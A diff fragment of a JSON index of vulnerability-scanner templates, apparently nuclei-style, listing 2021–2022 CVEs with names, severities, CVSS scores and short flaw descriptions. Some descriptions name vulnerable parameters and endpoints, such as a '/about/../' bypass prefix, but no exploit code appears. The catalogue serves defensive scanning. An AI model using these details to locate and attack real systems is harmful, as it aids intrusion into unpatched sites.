{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-24947.yaml"}
{"ID":"CVE-2021-24987","Info":{"Name":"WordPress Super Socializer \u003c7.13.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-24987.yaml"}
{"ID":"CVE-2021-24991","Info":{"Name":"WooCommerce PDF Invoices \u0026 Packing Slips WordPress Plugin \u003c 2.10.5 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin WooCommerce PDF Invoices \u0026 Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2021/CVE-2021-24991.yaml"}
@ -1034,7 +1042,7 @@
{"ID":"CVE-2021-25074","Info":{"Name":"WordPress WebP Converter for Media \u003c 4.0.3 - Unauthenticated Open Redirect","Severity":"medium","Description":"WordPress WebP Converter for Media \u003c 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25074.yaml"}
{"ID":"CVE-2021-25075","Info":{"Name":"WordPress Duplicate Page or Post \u003c1.5.1 - Cross-Site Scripting","Severity":"low","Description":"WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"cves/2021/CVE-2021-25075.yaml"}
{"ID":"CVE-2021-25085","Info":{"Name":"WOOF WordPress plugin - Cross-Site Scripting","Severity":"medium","Description":"The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25085.yaml"}
{"ID":"CVE-2021-25099","Info":{"Name":"Give \u003c 2.17.3 - Cross-Site Scripting","Severity":"medium","Description":"The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25099.yaml"}
{"ID":"CVE-2021-25099","Info":{"Name":"WordPress GiveWP \u003c2.17.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25099.yaml"}
{"ID":"CVE-2021-25104","Info":{"Name":"WordPress Ocean Extra \u003c1.9.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25104.yaml"}
{"ID":"CVE-2021-25111","Info":{"Name":"WordPress English Admin \u003c1.5.2 - Open Redirect","Severity":"medium","Description":"WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.10"}},"file_path":"cves/2021/CVE-2021-25111.yaml"}
{"ID":"CVE-2021-25112","Info":{"Name":"WordPress WHMCS Bridge \u003c6.4b - Cross-Site Scripting","Severity":"medium","Description":"WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-25112.yaml"}
@ -1096,6 +1104,7 @@
{"ID":"CVE-2021-30461","Info":{"Name":"VoipMonitor \u003c24.61 - Remote Code Execution","Severity":"critical","Description":"VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-30461.yaml"}
{"ID":"CVE-2021-30497","Info":{"Name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","Severity":"high","Description":"Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-30497.yaml"}
{"ID":"CVE-2021-3110","Info":{"Name":"PrestaShop 1.7.7.0 - SQL Injection","Severity":"critical","Description":"PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-3110.yaml"}
{"ID":"CVE-2021-31195","Info":{"Name":"Microsoft Exchange Server - Cross-Site Scripting","Severity":"high","Description":"Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-31195.yaml"}
{"ID":"CVE-2021-31249","Info":{"Name":"CHIYU TCP/IP Converter devices - CRLF injection","Severity":"medium","Description":"A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-31249.yaml"}
{"ID":"CVE-2021-31250","Info":{"Name":"CHIYU TCP/IP Converter - Cross-Site Scripting","Severity":"medium","Description":"CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-31250.yaml"}
{"ID":"CVE-2021-3129","Info":{"Name":"Laravel with Ignition \u003c= v8.4.2 Debug Mode - Remote Code Execution","Severity":"critical","Description":"Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-3129.yaml"}
@ -1140,7 +1149,7 @@
{"ID":"CVE-2021-34805","Info":{"Name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","Severity":"high","Description":"FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-34805.yaml"}
{"ID":"CVE-2021-35265","Info":{"Name":"MaxSite CMS Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.\"","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-35265.yaml"}
{"ID":"CVE-2021-35336","Info":{"Name":"Tieline IP Audio Gateway \u003c=2.6.4.8 - Unauthorized Remote Admin Panel Access","Severity":"critical","Description":"Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-35336.yaml"}
{"ID":"CVE-2021-35380","Info":{"Name":"TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read","Severity":"high","Description":"A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-35380.yaml"}
{"ID":"CVE-2021-35380","Info":{"Name":"TermTalk Server 3.24.0.2 - Local File Inclusion","Severity":"high","Description":"TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-35380.yaml"}
{"ID":"CVE-2021-35464","Info":{"Name":"ForgeRock OpenAM \u003c7.0 - Remote Code Execution","Severity":"critical","Description":"ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages.\nThe exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted\n/ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)\nfound in versions of Java 8 or earlier.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-35464.yaml"}
{"ID":"CVE-2021-35488","Info":{"Name":"Thruk 2.40-2 - Cross-Site Scripting","Severity":"medium","Description":"Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined\u0026title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-35488.yaml"}
{"ID":"CVE-2021-35587","Info":{"Name":"Oracle Access Manager - Remote Code Execution","Severity":"critical","Description":"The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-35587.yaml"}
@ -1183,7 +1192,7 @@
{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"cves/2021/CVE-2021-40438.yaml"}
{"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-40539.yaml"}
{"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-40542.yaml"}
{"ID":"CVE-2021-40661","Info":{"Name":"IND780 - Directory Traversal","Severity":"high","Description":"A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40661.yaml"}
{"ID":"CVE-2021-40661","Info":{"Name":"IND780 - Local File Inclusion","Severity":"high","Description":"IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40661.yaml"}
{"ID":"CVE-2021-40822","Info":{"Name":"Geoserver - Server-Side Request Forgery","Severity":"high","Description":"GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40822.yaml"}
{"ID":"CVE-2021-40856","Info":{"Name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","Severity":"high","Description":"Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix \"/about/../\" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40856.yaml"}
{"ID":"CVE-2021-40859","Info":{"Name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","Severity":"critical","Description":"Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint (\"https://192.168.1[.]2/about_state\"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-40859.yaml"}
@ -1229,12 +1238,12 @@
{"ID":"CVE-2021-42887","Info":{"Name":"TOTOLINK - Authentication Bypass","Severity":"critical","Description":"In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42887.yaml"}
{"ID":"CVE-2021-43062","Info":{"Name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-43062.yaml"}
{"ID":"CVE-2021-43287","Info":{"Name":"Pre-Auth Takeover of Build Pipelines in GoCD","Severity":"high","Description":"GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43287.yaml"}
{"ID":"CVE-2021-43421","Info":{"Name":"Studio-42 elFinder \u003c 2.1.60 - Arbitrary File Upload","Severity":"critical","Description":"A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-43421.yaml"}
{"ID":"CVE-2021-43421","Info":{"Name":"Studio-42 elFinder \u003c2.1.60 - Arbitrary File Upload","Severity":"critical","Description":"Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-43421.yaml"}
{"ID":"CVE-2021-43495","Info":{"Name":"AlquistManager Local File Inclusion","Severity":"high","Description":"AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43495.yaml"}
{"ID":"CVE-2021-43496","Info":{"Name":"Clustering Local File Inclusion","Severity":"high","Description":"Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43496.yaml"}
{"ID":"CVE-2021-43510","Info":{"Name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-43510.yaml"}
{"ID":"CVE-2021-43574","Info":{"Name":"Atmail 6.5.0 - Cross-Site Scripting","Severity":"medium","Description":"Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-43574.yaml"}
{"ID":"CVE-2021-43734","Info":{"Name":"kkFileview v4.0.0 - Directory Traversal","Severity":"high","Description":"kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43734.yaml"}
{"ID":"CVE-2021-43734","Info":{"Name":"kkFileview v4.0.0 - Local File Inclusion","Severity":"high","Description":"kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43734.yaml"}
{"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43778.yaml"}
{"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43798.yaml"}
{"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-43810.yaml"}
@ -1242,7 +1251,7 @@
{"ID":"CVE-2021-44152","Info":{"Name":"Reprise License Manager 14.2 - Authentication Bypass","Severity":"critical","Description":"Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44152.yaml"}
{"ID":"CVE-2021-44228","Info":{"Name":"Apache Log4j2 Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\n","Classification":{"CVSSScore":"10"}},"file_path":"cves/2021/CVE-2021-44228.yaml"}
{"ID":"CVE-2021-44427","Info":{"Name":"Rosario Student Information System Unauthenticated SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44427.yaml"}
{"ID":"CVE-2021-44451","Info":{"Name":"Apache Superset - Default Login","Severity":"medium","Description":"Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-44451.yaml"}
{"ID":"CVE-2021-44451","Info":{"Name":"Apache Superset \u003c=1.3.2 - Default Login","Severity":"medium","Description":"Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-44451.yaml"}
{"ID":"CVE-2021-44515","Info":{"Name":"Zoho ManageEngine Desktop Central - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44515.yaml"}
{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2021/CVE-2021-44521.yaml"}
{"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-44528.yaml"}
@ -1280,6 +1289,7 @@
{"ID":"CVE-2022-0208","Info":{"Name":"WordPress Plugin MapPress \u003c2.73.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the \"Bad mapid\" error message, leading to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0208.yaml"}
{"ID":"CVE-2022-0218","Info":{"Name":"HTML Email Template Designer \u003c 3.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0218.yaml"}
{"ID":"CVE-2022-0220","Info":{"Name":"WordPress GDPR \u0026 CCPA \u003c1.9.27 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GDPR \u0026 CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an \"application/json\" content-type, and JavaScript code may be executed on a victim's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0220.yaml"}
{"ID":"CVE-2022-0234","Info":{"Name":"WOOCS \u003c 1.3.7.5 - Reflected Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0234.yaml"}
{"ID":"CVE-2022-0271","Info":{"Name":"LearnPress \u003c4.1.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0271.yaml"}
{"ID":"CVE-2022-0281","Info":{"Name":"Microweber Information Disclosure","Severity":"high","Description":"Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-0281.yaml"}
{"ID":"CVE-2022-0288","Info":{"Name":"WordPress Ad Inserter \u003c2.7.10 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0288.yaml"}
@ -1310,18 +1320,18 @@
{"ID":"CVE-2022-0735","Info":{"Name":"GitLab CE/EE - Runner Registration Token Disclosure","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0735.yaml"}
{"ID":"CVE-2022-0776","Info":{"Name":"RevealJS postMessage \u003c4.3.0 - Cross-Site Scripting","Severity":"high","Description":"RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-0776.yaml"}
{"ID":"CVE-2022-0781","Info":{"Name":"WordPress Nirweb Support \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0781.yaml"}
{"ID":"CVE-2022-0784","Info":{"Name":"Title Experiments Free \u003c 9.0.1 - Unauthenticated SQLi","Severity":"critical","Description":"The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0784.yaml"}
{"ID":"CVE-2022-0784","Info":{"Name":"WordPress Title Experiments Free \u003c9.0.1 - SQL Injection","Severity":"critical","Description":"WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0784.yaml"}
{"ID":"CVE-2022-0785","Info":{"Name":"WordPress Daily Prayer Time \u003c2022.03.01 - SQL Injection","Severity":"critical","Description":"WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0785.yaml"}
{"ID":"CVE-2022-0786","Info":{"Name":"KiviCare \u003c 2.3.9 - Unauthenticated SQLi","Severity":"critical","Description":"The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0786.yaml"}
{"ID":"CVE-2022-0786","Info":{"Name":"WordPress KiviCare \u003c2.3.9 - SQL Injection","Severity":"critical","Description":"WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0786.yaml"}
{"ID":"CVE-2022-0788","Info":{"Name":"WordPress WP Fundraising Donation and Crowdfunding Platform \u003c1.5.0 - SQL Injection","Severity":"critical","Description":"WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0788.yaml"}
{"ID":"CVE-2022-0817","Info":{"Name":"WordPress BadgeOS \u003c=3.7.0 - SQL Injection","Severity":"critical","Description":"WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0817.yaml"}
